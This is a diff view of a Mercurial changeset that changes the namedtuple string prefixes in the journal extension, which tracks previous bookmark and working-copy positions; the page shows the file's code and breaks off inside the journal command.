##// END OF EJS Templates
global: use raw strings for namedtuple()...
Gregory Szorc -
r42000:7f63ec69 default
parent child Browse files
Show More
@@ -1,527 +1,527 b''
1 # journal.py
1 # journal.py
2 #
2 #
3 # Copyright 2014-2016 Facebook, Inc.
3 # Copyright 2014-2016 Facebook, Inc.
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 """track previous positions of bookmarks (EXPERIMENTAL)
7 """track previous positions of bookmarks (EXPERIMENTAL)
8
8
9 This extension adds a new command: `hg journal`, which shows you where
9 This extension adds a new command: `hg journal`, which shows you where
10 bookmarks were previously located.
10 bookmarks were previously located.
11
11
12 """
12 """
13
13
14 from __future__ import absolute_import
14 from __future__ import absolute_import
15
15
16 import collections
16 import collections
17 import errno
17 import errno
18 import os
18 import os
19 import weakref
19 import weakref
20
20
21 from mercurial.i18n import _
21 from mercurial.i18n import _
22
22
23 from mercurial import (
23 from mercurial import (
24 bookmarks,
24 bookmarks,
25 cmdutil,
25 cmdutil,
26 dispatch,
26 dispatch,
27 encoding,
27 encoding,
28 error,
28 error,
29 extensions,
29 extensions,
30 hg,
30 hg,
31 localrepo,
31 localrepo,
32 lock,
32 lock,
33 logcmdutil,
33 logcmdutil,
34 node,
34 node,
35 pycompat,
35 pycompat,
36 registrar,
36 registrar,
37 util,
37 util,
38 )
38 )
39 from mercurial.utils import (
39 from mercurial.utils import (
40 dateutil,
40 dateutil,
41 procutil,
41 procutil,
42 stringutil,
42 stringutil,
43 )
43 )
44
44
45 cmdtable = {}
45 cmdtable = {}
46 command = registrar.command(cmdtable)
46 command = registrar.command(cmdtable)
47
47
48 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
48 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
49 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
49 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
50 # be specifying the version(s) of Mercurial they are tested with, or
50 # be specifying the version(s) of Mercurial they are tested with, or
51 # leave the attribute unspecified.
51 # leave the attribute unspecified.
52 testedwith = 'ships-with-hg-core'
52 testedwith = 'ships-with-hg-core'
53
53
54 # storage format version; increment when the format changes
54 # storage format version; increment when the format changes
55 storageversion = 0
55 storageversion = 0
56
56
57 # namespaces
57 # namespaces
58 bookmarktype = 'bookmark'
58 bookmarktype = 'bookmark'
59 wdirparenttype = 'wdirparent'
59 wdirparenttype = 'wdirparent'
60 # In a shared repository, what shared feature name is used
60 # In a shared repository, what shared feature name is used
61 # to indicate this namespace is shared with the source?
61 # to indicate this namespace is shared with the source?
62 sharednamespaces = {
62 sharednamespaces = {
63 bookmarktype: hg.sharedbookmarks,
63 bookmarktype: hg.sharedbookmarks,
64 }
64 }
65
65
66 # Journal recording, register hooks and storage object
66 # Journal recording, register hooks and storage object
67 def extsetup(ui):
67 def extsetup(ui):
68 extensions.wrapfunction(dispatch, 'runcommand', runcommand)
68 extensions.wrapfunction(dispatch, 'runcommand', runcommand)
69 extensions.wrapfunction(bookmarks.bmstore, '_write', recordbookmarks)
69 extensions.wrapfunction(bookmarks.bmstore, '_write', recordbookmarks)
70 extensions.wrapfilecache(
70 extensions.wrapfilecache(
71 localrepo.localrepository, 'dirstate', wrapdirstate)
71 localrepo.localrepository, 'dirstate', wrapdirstate)
72 extensions.wrapfunction(hg, 'postshare', wrappostshare)
72 extensions.wrapfunction(hg, 'postshare', wrappostshare)
73 extensions.wrapfunction(hg, 'copystore', unsharejournal)
73 extensions.wrapfunction(hg, 'copystore', unsharejournal)
74
74
75 def reposetup(ui, repo):
75 def reposetup(ui, repo):
76 if repo.local():
76 if repo.local():
77 repo.journal = journalstorage(repo)
77 repo.journal = journalstorage(repo)
78 repo._wlockfreeprefix.add('namejournal')
78 repo._wlockfreeprefix.add('namejournal')
79
79
80 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
80 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
81 if cached:
81 if cached:
82 # already instantiated dirstate isn't yet marked as
82 # already instantiated dirstate isn't yet marked as
83 # "journal"-ing, even though repo.dirstate() was already
83 # "journal"-ing, even though repo.dirstate() was already
84 # wrapped by own wrapdirstate()
84 # wrapped by own wrapdirstate()
85 _setupdirstate(repo, dirstate)
85 _setupdirstate(repo, dirstate)
86
86
87 def runcommand(orig, lui, repo, cmd, fullargs, *args):
87 def runcommand(orig, lui, repo, cmd, fullargs, *args):
88 """Track the command line options for recording in the journal"""
88 """Track the command line options for recording in the journal"""
89 journalstorage.recordcommand(*fullargs)
89 journalstorage.recordcommand(*fullargs)
90 return orig(lui, repo, cmd, fullargs, *args)
90 return orig(lui, repo, cmd, fullargs, *args)
91
91
92 def _setupdirstate(repo, dirstate):
92 def _setupdirstate(repo, dirstate):
93 dirstate.journalstorage = repo.journal
93 dirstate.journalstorage = repo.journal
94 dirstate.addparentchangecallback('journal', recorddirstateparents)
94 dirstate.addparentchangecallback('journal', recorddirstateparents)
95
95
96 # hooks to record dirstate changes
96 # hooks to record dirstate changes
97 def wrapdirstate(orig, repo):
97 def wrapdirstate(orig, repo):
98 """Make journal storage available to the dirstate object"""
98 """Make journal storage available to the dirstate object"""
99 dirstate = orig(repo)
99 dirstate = orig(repo)
100 if util.safehasattr(repo, 'journal'):
100 if util.safehasattr(repo, 'journal'):
101 _setupdirstate(repo, dirstate)
101 _setupdirstate(repo, dirstate)
102 return dirstate
102 return dirstate
103
103
104 def recorddirstateparents(dirstate, old, new):
104 def recorddirstateparents(dirstate, old, new):
105 """Records all dirstate parent changes in the journal."""
105 """Records all dirstate parent changes in the journal."""
106 old = list(old)
106 old = list(old)
107 new = list(new)
107 new = list(new)
108 if util.safehasattr(dirstate, 'journalstorage'):
108 if util.safehasattr(dirstate, 'journalstorage'):
109 # only record two hashes if there was a merge
109 # only record two hashes if there was a merge
110 oldhashes = old[:1] if old[1] == node.nullid else old
110 oldhashes = old[:1] if old[1] == node.nullid else old
111 newhashes = new[:1] if new[1] == node.nullid else new
111 newhashes = new[:1] if new[1] == node.nullid else new
112 dirstate.journalstorage.record(
112 dirstate.journalstorage.record(
113 wdirparenttype, '.', oldhashes, newhashes)
113 wdirparenttype, '.', oldhashes, newhashes)
114
114
115 # hooks to record bookmark changes (both local and remote)
115 # hooks to record bookmark changes (both local and remote)
116 def recordbookmarks(orig, store, fp):
116 def recordbookmarks(orig, store, fp):
117 """Records all bookmark changes in the journal."""
117 """Records all bookmark changes in the journal."""
118 repo = store._repo
118 repo = store._repo
119 if util.safehasattr(repo, 'journal'):
119 if util.safehasattr(repo, 'journal'):
120 oldmarks = bookmarks.bmstore(repo)
120 oldmarks = bookmarks.bmstore(repo)
121 for mark, value in store.iteritems():
121 for mark, value in store.iteritems():
122 oldvalue = oldmarks.get(mark, node.nullid)
122 oldvalue = oldmarks.get(mark, node.nullid)
123 if value != oldvalue:
123 if value != oldvalue:
124 repo.journal.record(bookmarktype, mark, oldvalue, value)
124 repo.journal.record(bookmarktype, mark, oldvalue, value)
125 return orig(store, fp)
125 return orig(store, fp)
126
126
127 # shared repository support
127 # shared repository support
128 def _readsharedfeatures(repo):
128 def _readsharedfeatures(repo):
129 """A set of shared features for this repository"""
129 """A set of shared features for this repository"""
130 try:
130 try:
131 return set(repo.vfs.read('shared').splitlines())
131 return set(repo.vfs.read('shared').splitlines())
132 except IOError as inst:
132 except IOError as inst:
133 if inst.errno != errno.ENOENT:
133 if inst.errno != errno.ENOENT:
134 raise
134 raise
135 return set()
135 return set()
136
136
137 def _mergeentriesiter(*iterables, **kwargs):
137 def _mergeentriesiter(*iterables, **kwargs):
138 """Given a set of sorted iterables, yield the next entry in merged order
138 """Given a set of sorted iterables, yield the next entry in merged order
139
139
140 Note that by default entries go from most recent to oldest.
140 Note that by default entries go from most recent to oldest.
141 """
141 """
142 order = kwargs.pop(r'order', max)
142 order = kwargs.pop(r'order', max)
143 iterables = [iter(it) for it in iterables]
143 iterables = [iter(it) for it in iterables]
144 # this tracks still active iterables; iterables are deleted as they are
144 # this tracks still active iterables; iterables are deleted as they are
145 # exhausted, which is why this is a dictionary and why each entry also
145 # exhausted, which is why this is a dictionary and why each entry also
146 # stores the key. Entries are mutable so we can store the next value each
146 # stores the key. Entries are mutable so we can store the next value each
147 # time.
147 # time.
148 iterable_map = {}
148 iterable_map = {}
149 for key, it in enumerate(iterables):
149 for key, it in enumerate(iterables):
150 try:
150 try:
151 iterable_map[key] = [next(it), key, it]
151 iterable_map[key] = [next(it), key, it]
152 except StopIteration:
152 except StopIteration:
153 # empty entry, can be ignored
153 # empty entry, can be ignored
154 pass
154 pass
155
155
156 while iterable_map:
156 while iterable_map:
157 value, key, it = order(iterable_map.itervalues())
157 value, key, it = order(iterable_map.itervalues())
158 yield value
158 yield value
159 try:
159 try:
160 iterable_map[key][0] = next(it)
160 iterable_map[key][0] = next(it)
161 except StopIteration:
161 except StopIteration:
162 # this iterable is empty, remove it from consideration
162 # this iterable is empty, remove it from consideration
163 del iterable_map[key]
163 del iterable_map[key]
164
164
165 def wrappostshare(orig, sourcerepo, destrepo, **kwargs):
165 def wrappostshare(orig, sourcerepo, destrepo, **kwargs):
166 """Mark this shared working copy as sharing journal information"""
166 """Mark this shared working copy as sharing journal information"""
167 with destrepo.wlock():
167 with destrepo.wlock():
168 orig(sourcerepo, destrepo, **kwargs)
168 orig(sourcerepo, destrepo, **kwargs)
169 with destrepo.vfs('shared', 'a') as fp:
169 with destrepo.vfs('shared', 'a') as fp:
170 fp.write('journal\n')
170 fp.write('journal\n')
171
171
172 def unsharejournal(orig, ui, repo, repopath):
172 def unsharejournal(orig, ui, repo, repopath):
173 """Copy shared journal entries into this repo when unsharing"""
173 """Copy shared journal entries into this repo when unsharing"""
174 if (repo.path == repopath and repo.shared() and
174 if (repo.path == repopath and repo.shared() and
175 util.safehasattr(repo, 'journal')):
175 util.safehasattr(repo, 'journal')):
176 sharedrepo = hg.sharedreposource(repo)
176 sharedrepo = hg.sharedreposource(repo)
177 sharedfeatures = _readsharedfeatures(repo)
177 sharedfeatures = _readsharedfeatures(repo)
178 if sharedrepo and sharedfeatures > {'journal'}:
178 if sharedrepo and sharedfeatures > {'journal'}:
179 # there is a shared repository and there are shared journal entries
179 # there is a shared repository and there are shared journal entries
180 # to copy. move shared date over from source to destination but
180 # to copy. move shared date over from source to destination but
181 # move the local file first
181 # move the local file first
182 if repo.vfs.exists('namejournal'):
182 if repo.vfs.exists('namejournal'):
183 journalpath = repo.vfs.join('namejournal')
183 journalpath = repo.vfs.join('namejournal')
184 util.rename(journalpath, journalpath + '.bak')
184 util.rename(journalpath, journalpath + '.bak')
185 storage = repo.journal
185 storage = repo.journal
186 local = storage._open(
186 local = storage._open(
187 repo.vfs, filename='namejournal.bak', _newestfirst=False)
187 repo.vfs, filename='namejournal.bak', _newestfirst=False)
188 shared = (
188 shared = (
189 e for e in storage._open(sharedrepo.vfs, _newestfirst=False)
189 e for e in storage._open(sharedrepo.vfs, _newestfirst=False)
190 if sharednamespaces.get(e.namespace) in sharedfeatures)
190 if sharednamespaces.get(e.namespace) in sharedfeatures)
191 for entry in _mergeentriesiter(local, shared, order=min):
191 for entry in _mergeentriesiter(local, shared, order=min):
192 storage._write(repo.vfs, entry)
192 storage._write(repo.vfs, entry)
193
193
194 return orig(ui, repo, repopath)
194 return orig(ui, repo, repopath)
195
195
196 class journalentry(collections.namedtuple(
196 class journalentry(collections.namedtuple(
197 u'journalentry',
197 r'journalentry',
198 u'timestamp user command namespace name oldhashes newhashes')):
198 r'timestamp user command namespace name oldhashes newhashes')):
199 """Individual journal entry
199 """Individual journal entry
200
200
201 * timestamp: a mercurial (time, timezone) tuple
201 * timestamp: a mercurial (time, timezone) tuple
202 * user: the username that ran the command
202 * user: the username that ran the command
203 * namespace: the entry namespace, an opaque string
203 * namespace: the entry namespace, an opaque string
204 * name: the name of the changed item, opaque string with meaning in the
204 * name: the name of the changed item, opaque string with meaning in the
205 namespace
205 namespace
206 * command: the hg command that triggered this record
206 * command: the hg command that triggered this record
207 * oldhashes: a tuple of one or more binary hashes for the old location
207 * oldhashes: a tuple of one or more binary hashes for the old location
208 * newhashes: a tuple of one or more binary hashes for the new location
208 * newhashes: a tuple of one or more binary hashes for the new location
209
209
210 Handles serialisation from and to the storage format. Fields are
210 Handles serialisation from and to the storage format. Fields are
211 separated by newlines, hashes are written out in hex separated by commas,
211 separated by newlines, hashes are written out in hex separated by commas,
212 timestamp and timezone are separated by a space.
212 timestamp and timezone are separated by a space.
213
213
214 """
214 """
215 @classmethod
215 @classmethod
216 def fromstorage(cls, line):
216 def fromstorage(cls, line):
217 (time, user, command, namespace, name,
217 (time, user, command, namespace, name,
218 oldhashes, newhashes) = line.split('\n')
218 oldhashes, newhashes) = line.split('\n')
219 timestamp, tz = time.split()
219 timestamp, tz = time.split()
220 timestamp, tz = float(timestamp), int(tz)
220 timestamp, tz = float(timestamp), int(tz)
221 oldhashes = tuple(node.bin(hash) for hash in oldhashes.split(','))
221 oldhashes = tuple(node.bin(hash) for hash in oldhashes.split(','))
222 newhashes = tuple(node.bin(hash) for hash in newhashes.split(','))
222 newhashes = tuple(node.bin(hash) for hash in newhashes.split(','))
223 return cls(
223 return cls(
224 (timestamp, tz), user, command, namespace, name,
224 (timestamp, tz), user, command, namespace, name,
225 oldhashes, newhashes)
225 oldhashes, newhashes)
226
226
227 def __bytes__(self):
227 def __bytes__(self):
228 """bytes representation for storage"""
228 """bytes representation for storage"""
229 time = ' '.join(map(pycompat.bytestr, self.timestamp))
229 time = ' '.join(map(pycompat.bytestr, self.timestamp))
230 oldhashes = ','.join([node.hex(hash) for hash in self.oldhashes])
230 oldhashes = ','.join([node.hex(hash) for hash in self.oldhashes])
231 newhashes = ','.join([node.hex(hash) for hash in self.newhashes])
231 newhashes = ','.join([node.hex(hash) for hash in self.newhashes])
232 return '\n'.join((
232 return '\n'.join((
233 time, self.user, self.command, self.namespace, self.name,
233 time, self.user, self.command, self.namespace, self.name,
234 oldhashes, newhashes))
234 oldhashes, newhashes))
235
235
236 __str__ = encoding.strmethod(__bytes__)
236 __str__ = encoding.strmethod(__bytes__)
237
237
238 class journalstorage(object):
238 class journalstorage(object):
239 """Storage for journal entries
239 """Storage for journal entries
240
240
241 Entries are divided over two files; one with entries that pertain to the
241 Entries are divided over two files; one with entries that pertain to the
242 local working copy *only*, and one with entries that are shared across
242 local working copy *only*, and one with entries that are shared across
243 multiple working copies when shared using the share extension.
243 multiple working copies when shared using the share extension.
244
244
245 Entries are stored with NUL bytes as separators. See the journalentry
245 Entries are stored with NUL bytes as separators. See the journalentry
246 class for the per-entry structure.
246 class for the per-entry structure.
247
247
248 The file format starts with an integer version, delimited by a NUL.
248 The file format starts with an integer version, delimited by a NUL.
249
249
250 This storage uses a dedicated lock; this makes it easier to avoid issues
250 This storage uses a dedicated lock; this makes it easier to avoid issues
251 with adding entries that added when the regular wlock is unlocked (e.g.
251 with adding entries that added when the regular wlock is unlocked (e.g.
252 the dirstate).
252 the dirstate).
253
253
254 """
254 """
255 _currentcommand = ()
255 _currentcommand = ()
256 _lockref = None
256 _lockref = None
257
257
258 def __init__(self, repo):
258 def __init__(self, repo):
259 self.user = procutil.getuser()
259 self.user = procutil.getuser()
260 self.ui = repo.ui
260 self.ui = repo.ui
261 self.vfs = repo.vfs
261 self.vfs = repo.vfs
262
262
263 # is this working copy using a shared storage?
263 # is this working copy using a shared storage?
264 self.sharedfeatures = self.sharedvfs = None
264 self.sharedfeatures = self.sharedvfs = None
265 if repo.shared():
265 if repo.shared():
266 features = _readsharedfeatures(repo)
266 features = _readsharedfeatures(repo)
267 sharedrepo = hg.sharedreposource(repo)
267 sharedrepo = hg.sharedreposource(repo)
268 if sharedrepo is not None and 'journal' in features:
268 if sharedrepo is not None and 'journal' in features:
269 self.sharedvfs = sharedrepo.vfs
269 self.sharedvfs = sharedrepo.vfs
270 self.sharedfeatures = features
270 self.sharedfeatures = features
271
271
272 # track the current command for recording in journal entries
272 # track the current command for recording in journal entries
273 @property
273 @property
274 def command(self):
274 def command(self):
275 commandstr = ' '.join(
275 commandstr = ' '.join(
276 map(procutil.shellquote, journalstorage._currentcommand))
276 map(procutil.shellquote, journalstorage._currentcommand))
277 if '\n' in commandstr:
277 if '\n' in commandstr:
278 # truncate multi-line commands
278 # truncate multi-line commands
279 commandstr = commandstr.partition('\n')[0] + ' ...'
279 commandstr = commandstr.partition('\n')[0] + ' ...'
280 return commandstr
280 return commandstr
281
281
282 @classmethod
282 @classmethod
283 def recordcommand(cls, *fullargs):
283 def recordcommand(cls, *fullargs):
284 """Set the current hg arguments, stored with recorded entries"""
284 """Set the current hg arguments, stored with recorded entries"""
285 # Set the current command on the class because we may have started
285 # Set the current command on the class because we may have started
286 # with a non-local repo (cloning for example).
286 # with a non-local repo (cloning for example).
287 cls._currentcommand = fullargs
287 cls._currentcommand = fullargs
288
288
289 def _currentlock(self, lockref):
289 def _currentlock(self, lockref):
290 """Returns the lock if it's held, or None if it's not.
290 """Returns the lock if it's held, or None if it's not.
291
291
292 (This is copied from the localrepo class)
292 (This is copied from the localrepo class)
293 """
293 """
294 if lockref is None:
294 if lockref is None:
295 return None
295 return None
296 l = lockref()
296 l = lockref()
297 if l is None or not l.held:
297 if l is None or not l.held:
298 return None
298 return None
299 return l
299 return l
300
300
301 def jlock(self, vfs):
301 def jlock(self, vfs):
302 """Create a lock for the journal file"""
302 """Create a lock for the journal file"""
303 if self._currentlock(self._lockref) is not None:
303 if self._currentlock(self._lockref) is not None:
304 raise error.Abort(_('journal lock does not support nesting'))
304 raise error.Abort(_('journal lock does not support nesting'))
305 desc = _('journal of %s') % vfs.base
305 desc = _('journal of %s') % vfs.base
306 try:
306 try:
307 l = lock.lock(vfs, 'namejournal.lock', 0, desc=desc)
307 l = lock.lock(vfs, 'namejournal.lock', 0, desc=desc)
308 except error.LockHeld as inst:
308 except error.LockHeld as inst:
309 self.ui.warn(
309 self.ui.warn(
310 _("waiting for lock on %s held by %r\n") % (desc, inst.locker))
310 _("waiting for lock on %s held by %r\n") % (desc, inst.locker))
311 # default to 600 seconds timeout
311 # default to 600 seconds timeout
312 l = lock.lock(
312 l = lock.lock(
313 vfs, 'namejournal.lock',
313 vfs, 'namejournal.lock',
314 self.ui.configint("ui", "timeout"), desc=desc)
314 self.ui.configint("ui", "timeout"), desc=desc)
315 self.ui.warn(_("got lock after %s seconds\n") % l.delay)
315 self.ui.warn(_("got lock after %s seconds\n") % l.delay)
316 self._lockref = weakref.ref(l)
316 self._lockref = weakref.ref(l)
317 return l
317 return l
318
318
319 def record(self, namespace, name, oldhashes, newhashes):
319 def record(self, namespace, name, oldhashes, newhashes):
320 """Record a new journal entry
320 """Record a new journal entry
321
321
322 * namespace: an opaque string; this can be used to filter on the type
322 * namespace: an opaque string; this can be used to filter on the type
323 of recorded entries.
323 of recorded entries.
324 * name: the name defining this entry; for bookmarks, this is the
324 * name: the name defining this entry; for bookmarks, this is the
325 bookmark name. Can be filtered on when retrieving entries.
325 bookmark name. Can be filtered on when retrieving entries.
326 * oldhashes and newhashes: each a single binary hash, or a list of
326 * oldhashes and newhashes: each a single binary hash, or a list of
327 binary hashes. These represent the old and new position of the named
327 binary hashes. These represent the old and new position of the named
328 item.
328 item.
329
329
330 """
330 """
331 if not isinstance(oldhashes, list):
331 if not isinstance(oldhashes, list):
332 oldhashes = [oldhashes]
332 oldhashes = [oldhashes]
333 if not isinstance(newhashes, list):
333 if not isinstance(newhashes, list):
334 newhashes = [newhashes]
334 newhashes = [newhashes]
335
335
336 entry = journalentry(
336 entry = journalentry(
337 dateutil.makedate(), self.user, self.command, namespace, name,
337 dateutil.makedate(), self.user, self.command, namespace, name,
338 oldhashes, newhashes)
338 oldhashes, newhashes)
339
339
340 vfs = self.vfs
340 vfs = self.vfs
341 if self.sharedvfs is not None:
341 if self.sharedvfs is not None:
342 # write to the shared repository if this feature is being
342 # write to the shared repository if this feature is being
343 # shared between working copies.
343 # shared between working copies.
344 if sharednamespaces.get(namespace) in self.sharedfeatures:
344 if sharednamespaces.get(namespace) in self.sharedfeatures:
345 vfs = self.sharedvfs
345 vfs = self.sharedvfs
346
346
347 self._write(vfs, entry)
347 self._write(vfs, entry)
348
348
349 def _write(self, vfs, entry):
349 def _write(self, vfs, entry):
350 with self.jlock(vfs):
350 with self.jlock(vfs):
351 # open file in amend mode to ensure it is created if missing
351 # open file in amend mode to ensure it is created if missing
352 with vfs('namejournal', mode='a+b') as f:
352 with vfs('namejournal', mode='a+b') as f:
353 f.seek(0, os.SEEK_SET)
353 f.seek(0, os.SEEK_SET)
354 # Read just enough bytes to get a version number (up to 2
354 # Read just enough bytes to get a version number (up to 2
355 # digits plus separator)
355 # digits plus separator)
356 version = f.read(3).partition('\0')[0]
356 version = f.read(3).partition('\0')[0]
357 if version and version != "%d" % storageversion:
357 if version and version != "%d" % storageversion:
358 # different version of the storage. Exit early (and not
358 # different version of the storage. Exit early (and not
359 # write anything) if this is not a version we can handle or
359 # write anything) if this is not a version we can handle or
360 # the file is corrupt. In future, perhaps rotate the file
360 # the file is corrupt. In future, perhaps rotate the file
361 # instead?
361 # instead?
362 self.ui.warn(
362 self.ui.warn(
363 _("unsupported journal file version '%s'\n") % version)
363 _("unsupported journal file version '%s'\n") % version)
364 return
364 return
365 if not version:
365 if not version:
366 # empty file, write version first
366 # empty file, write version first
367 f.write(("%d" % storageversion) + '\0')
367 f.write(("%d" % storageversion) + '\0')
368 f.seek(0, os.SEEK_END)
368 f.seek(0, os.SEEK_END)
369 f.write(bytes(entry) + '\0')
369 f.write(bytes(entry) + '\0')
370
370
371 def filtered(self, namespace=None, name=None):
371 def filtered(self, namespace=None, name=None):
372 """Yield all journal entries with the given namespace or name
372 """Yield all journal entries with the given namespace or name
373
373
374 Both the namespace and the name are optional; if neither is given all
374 Both the namespace and the name are optional; if neither is given all
375 entries in the journal are produced.
375 entries in the journal are produced.
376
376
377 Matching supports regular expressions by using the `re:` prefix
377 Matching supports regular expressions by using the `re:` prefix
378 (use `literal:` to match names or namespaces that start with `re:`)
378 (use `literal:` to match names or namespaces that start with `re:`)
379
379
380 """
380 """
381 if namespace is not None:
381 if namespace is not None:
382 namespace = stringutil.stringmatcher(namespace)[-1]
382 namespace = stringutil.stringmatcher(namespace)[-1]
383 if name is not None:
383 if name is not None:
384 name = stringutil.stringmatcher(name)[-1]
384 name = stringutil.stringmatcher(name)[-1]
385 for entry in self:
385 for entry in self:
386 if namespace is not None and not namespace(entry.namespace):
386 if namespace is not None and not namespace(entry.namespace):
387 continue
387 continue
388 if name is not None and not name(entry.name):
388 if name is not None and not name(entry.name):
389 continue
389 continue
390 yield entry
390 yield entry
391
391
392 def __iter__(self):
392 def __iter__(self):
393 """Iterate over the storage
393 """Iterate over the storage
394
394
395 Yields journalentry instances for each contained journal record.
395 Yields journalentry instances for each contained journal record.
396
396
397 """
397 """
398 local = self._open(self.vfs)
398 local = self._open(self.vfs)
399
399
400 if self.sharedvfs is None:
400 if self.sharedvfs is None:
401 return local
401 return local
402
402
403 # iterate over both local and shared entries, but only those
403 # iterate over both local and shared entries, but only those
404 # shared entries that are among the currently shared features
404 # shared entries that are among the currently shared features
405 shared = (
405 shared = (
406 e for e in self._open(self.sharedvfs)
406 e for e in self._open(self.sharedvfs)
407 if sharednamespaces.get(e.namespace) in self.sharedfeatures)
407 if sharednamespaces.get(e.namespace) in self.sharedfeatures)
408 return _mergeentriesiter(local, shared)
408 return _mergeentriesiter(local, shared)
409
409
410 def _open(self, vfs, filename='namejournal', _newestfirst=True):
410 def _open(self, vfs, filename='namejournal', _newestfirst=True):
411 if not vfs.exists(filename):
411 if not vfs.exists(filename):
412 return
412 return
413
413
414 with vfs(filename) as f:
414 with vfs(filename) as f:
415 raw = f.read()
415 raw = f.read()
416
416
417 lines = raw.split('\0')
417 lines = raw.split('\0')
418 version = lines and lines[0]
418 version = lines and lines[0]
419 if version != "%d" % storageversion:
419 if version != "%d" % storageversion:
420 version = version or _('not available')
420 version = version or _('not available')
421 raise error.Abort(_("unknown journal file version '%s'") % version)
421 raise error.Abort(_("unknown journal file version '%s'") % version)
422
422
423 # Skip the first line, it's a version number. Normally we iterate over
423 # Skip the first line, it's a version number. Normally we iterate over
424 # these in reverse order to list newest first; only when copying across
424 # these in reverse order to list newest first; only when copying across
425 # a shared storage do we forgo reversing.
425 # a shared storage do we forgo reversing.
426 lines = lines[1:]
426 lines = lines[1:]
427 if _newestfirst:
427 if _newestfirst:
428 lines = reversed(lines)
428 lines = reversed(lines)
429 for line in lines:
429 for line in lines:
430 if not line:
430 if not line:
431 continue
431 continue
432 yield journalentry.fromstorage(line)
432 yield journalentry.fromstorage(line)
433
433
434 # journal reading
434 # journal reading
435 # log options that don't make sense for journal
435 # log options that don't make sense for journal
436 _ignoreopts = ('no-merges', 'graph')
436 _ignoreopts = ('no-merges', 'graph')
437 @command(
437 @command(
438 'journal', [
438 'journal', [
439 ('', 'all', None, 'show history for all names'),
439 ('', 'all', None, 'show history for all names'),
440 ('c', 'commits', None, 'show commit metadata'),
440 ('c', 'commits', None, 'show commit metadata'),
441 ] + [opt for opt in cmdutil.logopts if opt[1] not in _ignoreopts],
441 ] + [opt for opt in cmdutil.logopts if opt[1] not in _ignoreopts],
442 '[OPTION]... [BOOKMARKNAME]',
442 '[OPTION]... [BOOKMARKNAME]',
443 helpcategory=command.CATEGORY_CHANGE_ORGANIZATION)
443 helpcategory=command.CATEGORY_CHANGE_ORGANIZATION)
444 def journal(ui, repo, *args, **opts):
444 def journal(ui, repo, *args, **opts):
445 """show the previous position of bookmarks and the working copy
445 """show the previous position of bookmarks and the working copy
446
446
447 The journal is used to see the previous commits that bookmarks and the
447 The journal is used to see the previous commits that bookmarks and the
448 working copy pointed to. By default the previous locations for the working
448 working copy pointed to. By default the previous locations for the working
449 copy. Passing a bookmark name will show all the previous positions of
449 copy. Passing a bookmark name will show all the previous positions of
450 that bookmark. Use the --all switch to show previous locations for all
450 that bookmark. Use the --all switch to show previous locations for all
451 bookmarks and the working copy; each line will then include the bookmark
451 bookmarks and the working copy; each line will then include the bookmark
452 name, or '.' for the working copy, as well.
452 name, or '.' for the working copy, as well.
453
453
454 If `name` starts with `re:`, the remainder of the name is treated as
454 If `name` starts with `re:`, the remainder of the name is treated as
455 a regular expression. To match a name that actually starts with `re:`,
455 a regular expression. To match a name that actually starts with `re:`,
456 use the prefix `literal:`.
456 use the prefix `literal:`.
457
457
458 By default hg journal only shows the commit hash and the command that was
458 By default hg journal only shows the commit hash and the command that was
459 running at that time. -v/--verbose will show the prior hash, the user, and
459 running at that time. -v/--verbose will show the prior hash, the user, and
460 the time at which it happened.
460 the time at which it happened.
461
461
462 Use -c/--commits to output log information on each commit hash; at this
462 Use -c/--commits to output log information on each commit hash; at this
463 point you can use the usual `--patch`, `--git`, `--stat` and `--template`
463 point you can use the usual `--patch`, `--git`, `--stat` and `--template`
464 switches to alter the log output for these.
464 switches to alter the log output for these.
465
465
466 `hg journal -T json` can be used to produce machine readable output.
466 `hg journal -T json` can be used to produce machine readable output.
467
467
468 """
468 """
469 opts = pycompat.byteskwargs(opts)
469 opts = pycompat.byteskwargs(opts)
470 name = '.'
470 name = '.'
471 if opts.get('all'):
471 if opts.get('all'):
472 if args:
472 if args:
473 raise error.Abort(
473 raise error.Abort(
474 _("You can't combine --all and filtering on a name"))
474 _("You can't combine --all and filtering on a name"))
475 name = None
475 name = None
476 if args:
476 if args:
477 name = args[0]
477 name = args[0]
478
478
479 fm = ui.formatter('journal', opts)
479 fm = ui.formatter('journal', opts)
480 def formatnodes(nodes):
480 def formatnodes(nodes):
481 return fm.formatlist(map(fm.hexfunc, nodes), name='node', sep=',')
481 return fm.formatlist(map(fm.hexfunc, nodes), name='node', sep=',')
482
482
483 if opts.get("template") != "json":
483 if opts.get("template") != "json":
484 if name is None:
484 if name is None:
485 displayname = _('the working copy and bookmarks')
485 displayname = _('the working copy and bookmarks')
486 else:
486 else:
487 displayname = "'%s'" % name
487 displayname = "'%s'" % name
488 ui.status(_("previous locations of %s:\n") % displayname)
488 ui.status(_("previous locations of %s:\n") % displayname)
489
489
490 limit = logcmdutil.getlimit(opts)
490 limit = logcmdutil.getlimit(opts)
491 entry = None
491 entry = None
492 ui.pager('journal')
492 ui.pager('journal')
493 for count, entry in enumerate(repo.journal.filtered(name=name)):
493 for count, entry in enumerate(repo.journal.filtered(name=name)):
494 if count == limit:
494 if count == limit:
495 break
495 break
496
496
497 fm.startitem()
497 fm.startitem()
498 fm.condwrite(ui.verbose, 'oldnodes', '%s -> ',
498 fm.condwrite(ui.verbose, 'oldnodes', '%s -> ',
499 formatnodes(entry.oldhashes))
499 formatnodes(entry.oldhashes))
500 fm.write('newnodes', '%s', formatnodes(entry.newhashes))
500 fm.write('newnodes', '%s', formatnodes(entry.newhashes))
501 fm.condwrite(ui.verbose, 'user', ' %-8s', entry.user)
501 fm.condwrite(ui.verbose, 'user', ' %-8s', entry.user)
502 fm.condwrite(
502 fm.condwrite(
503 opts.get('all') or name.startswith('re:'),
503 opts.get('all') or name.startswith('re:'),
504 'name', ' %-8s', entry.name)
504 'name', ' %-8s', entry.name)
505
505
506 fm.condwrite(ui.verbose, 'date', ' %s',
506 fm.condwrite(ui.verbose, 'date', ' %s',
507 fm.formatdate(entry.timestamp, '%Y-%m-%d %H:%M %1%2'))
507 fm.formatdate(entry.timestamp, '%Y-%m-%d %H:%M %1%2'))
508 fm.write('command', ' %s\n', entry.command)
508 fm.write('command', ' %s\n', entry.command)
509
509
510 if opts.get("commits"):
